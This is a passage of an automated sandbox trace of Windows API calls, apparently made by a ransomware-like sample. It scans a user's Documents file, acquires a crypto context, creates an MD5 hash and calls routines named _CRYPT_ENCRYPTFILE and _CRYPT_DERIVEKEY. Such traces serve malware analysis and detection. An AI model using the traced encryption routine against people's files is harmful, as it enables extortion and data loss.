cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="__ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.136] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.136] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0173.136] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.136] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.137] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.137] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.137] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.137] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.137] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d462660, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x31badc20, ftLastAccessTime.dwHighDateTime=0x1d5e09b, ftLastWriteTime.dwLowDateTime=0x31badc20, ftLastWriteTime.dwHighDateTime=0x1d5e09b, nFileSizeHigh=0x0, nFileSizeLow=0xde49, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="uS __ 9ClmNKU6A.odt", cAlternateFileName="US__9C~1.ODT")) returned 0x90ae18 [0173.137] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.137] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.137] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.138] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.138] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0173.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.138] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0173.138] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.138] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.138] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.138] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.138] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0173.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.138] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0173.139] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.154] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0173.154] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.154] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.154] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.154] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0173.154] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.154] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.154] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.155] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.155] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.155] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.155] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.155] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.155] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.155] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.155] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.155] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.155] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.155] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.155] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.155] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.155] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.155] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.155] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0173.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.157] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.157] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0173.157] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.157] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0173.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, 